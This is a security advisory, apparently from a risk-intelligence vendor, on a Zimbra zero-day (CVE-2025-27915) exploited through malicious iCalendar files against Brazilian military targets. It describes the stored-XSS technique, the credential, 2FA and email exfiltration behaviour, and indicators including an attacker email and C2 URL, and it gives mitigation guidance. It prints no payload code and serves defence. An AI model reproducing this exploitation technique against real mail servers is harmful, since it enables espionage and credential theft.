Executive Summary

A highly targeted cyber-espionage campaign has been uncovered leveraging a zero-day vulnerability in Zimbra Collaboration Suite (ZCS), tracked as CVE-2025-27915, to compromise Brazilian military entities. The attackers weaponized malicious ICS (iCalendar) files to deliver a stored cross-site scripting (XSS) payload, enabling credential theft, email and contact exfiltration, and persistent unauthorized access. The campaign demonstrates advanced technical sophistication, with strong indications of state-sponsored involvement, and highlights the critical need for rapid patching, vigilant monitoring, and robust user awareness. This advisory provides a comprehensive technical breakdown, threat actor analysis, exploitation details, and actionable mitigation guidance for organizations using Zimbra or similar webmail platforms.

Threat Actor Profile

The tactics, techniques, and procedures (TTPs) observed in this campaign align with those of Russian-linked advanced persistent threat (APT) groups, particularly UNC1151 and entities tracked by Proofpoint as UNK_HeatSink. These actors are known for targeting government and military organizations in Latin America and Europe, often employing spear-phishing and webmail exploitation. The campaign’s use of language-specific lures, such as Spanish-language filter rules ("Correo"), and the sophistication of the payloads suggest a highly resourced, state-sponsored adversary. The infrastructure and operational security measures observed, including the use of obfuscated JavaScript, delayed execution, and selective targeting, further reinforce the attribution to a professional APT group with a history of targeting sensitive government communications.

Technical Analysis of Malware/TTPs

The attack chain began with spear-phishing emails sent to Brazilian military personnel, spoofing the Libyan Navy’s Office of Protocol and originating from the IP address 193.29.58.37. These emails contained malicious ICS attachments exceeding 10KB, each embedding obfuscated, base64-encoded JavaScript within the event description field. The exploit leveraged insufficient sanitization of HTML content in Zimbra’s calendar parsing logic, specifically abusing the ontoggle event within a <details> HTML tag. When a victim previewed or imported the ICS file in the Zimbra Classic Web Client, the JavaScript payload executed in the context of the user’s browser session.

The payload was modular, employing multiple Immediately Invoked Function Expressions (IIFE) to facilitate credential theft, email and contact exfiltration, and persistence. It created hidden fields to capture usernames and passwords during login, utilized the Zimbra SOAP API to search and exfiltrate emails from all folders at four-hour intervals, and stole contacts, distribution lists, and shared folders. The malware established persistence by creating malicious email filters that forwarded messages to attacker-controlled addresses, such as spam_to_junk@proton.me, and by hijacking webmail sessions. It also targeted two-factor authentication (2FA) mechanisms, exfiltrating scratch codes, trusted device tokens, and app-specific passwords. To evade detection, the payload delayed execution by 60 seconds, limited its activity to once every three days, and concealed UI elements associated with its operation. Exfiltration occurred via POST requests to the command-and-control (C2) endpoint at https://ffrk.net/apache2_config_default_51_2_1.

Exploitation in the Wild

The campaign was first detected through the identification of unusually large ICS files containing embedded JavaScript in the mailboxes of Brazilian military personnel. The exploitation was highly targeted, with no evidence of widespread indiscriminate attacks. The vulnerability was actively exploited prior to public disclosure and before the release of official patches, classifying it as a true zero-day. Following the discovery, CISA and other international agencies added CVE-2025-27915 to their Known Exploited Vulnerabilities catalogs, underscoring the criticality and real-world impact of the threat. Zimbra responded by releasing emergency patches for all supported versions, specifically ZCS 9.0.0 Patch 44, ZCS 10.0.13, and ZCS 10.1.5. Organizations running older or unsupported versions remain at significant risk and are strongly advised to upgrade immediately.

Victimology and Targeting

The primary victims of this campaign were Brazilian military and government entities, with evidence suggesting a deliberate focus on high-value targets involved in sensitive communications. The spear-phishing emails were crafted to appear as official correspondence from the Libyan Navy’s Office of Protocol, increasing the likelihood of successful social engineering. The use of Spanish-language filter rules and the targeting of Latin American government and military organizations are consistent with previous campaigns attributed to Russian and Belarusian APTs. While the campaign’s full scope remains under investigation, the precision and selectivity of the targeting indicate a clear intent to compromise strategic assets and exfiltrate confidential information.

Mitigation and Countermeasures

Immediate action is required to mitigate the risk posed by CVE-2025-27915. Organizations using Zimbra Collaboration Suite must apply the latest security updates without delay, referencing the official advisories at https://wiki.zimbra.com/wiki/Security_Center. Security teams should conduct comprehensive searches for the provided indicators of compromise (IOCs) in mail logs, web server logs, and Zimbra filter rules. User awareness training should be reinforced, emphasizing the risks associated with unsolicited calendar invites and spear-phishing attempts. In the event of suspected compromise, organizations should initiate full forensic analysis, reset all credentials, and review or remove unauthorized filter rules. Network segmentation should be implemented to restrict access between mail servers and critical internal systems, thereby reducing the risk of lateral movement. Continuous monitoring for anomalous outbound connections, especially to known C2 infrastructure such as https://ffrk.net/apache2_config_default_51_2_1, is essential for early detection of ongoing or future attacks.

References

StrikeReady Labs: 0day .ICS attack in the wild – https://strikeready.com/blog/0day-ics-attack-in-the-wild/

NVD Entry for CVE-2025-27915 – https://nvd.nist.gov/vuln/detail/CVE-2025-27915

Zimbra Security Center – https://wiki.zimbra.com/wiki/Security_Center

Zimbra Patch Release Notes – https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.13#Security_Fixes

BleepingComputer: Hackers exploited Zimbra flaw as zero-day using iCalendar files – https://www.bleepingcomputer.com/news/security/hackers-exploited-zimbra-flaw-as-zero-day-using-icalendar-files/

Security Affairs: Zimbra users targeted in zero-day exploit using iCalendar attachments – https://securityaffairs.com/183014/hacking/zimbra-users-targeted-in-zero-day-exploit-using-icalendar-attachments.html

CISA KEV Catalog – https://www.cisa.gov/known-exploited-vulnerabilities-catalog

About Rescana

Rescana is a leader in third-party risk management (TPRM) and cyber risk intelligence. Our platform empowers organizations to continuously monitor, assess, and mitigate cyber threats across their digital supply chain. By leveraging advanced analytics and real-time threat intelligence, Rescana enables security teams to proactively identify vulnerabilities, prioritize remediation, and ensure compliance with industry best practices. For more information about how our TPRM solutions can help safeguard your organization, we are happy to answer questions at ops@rescana.com.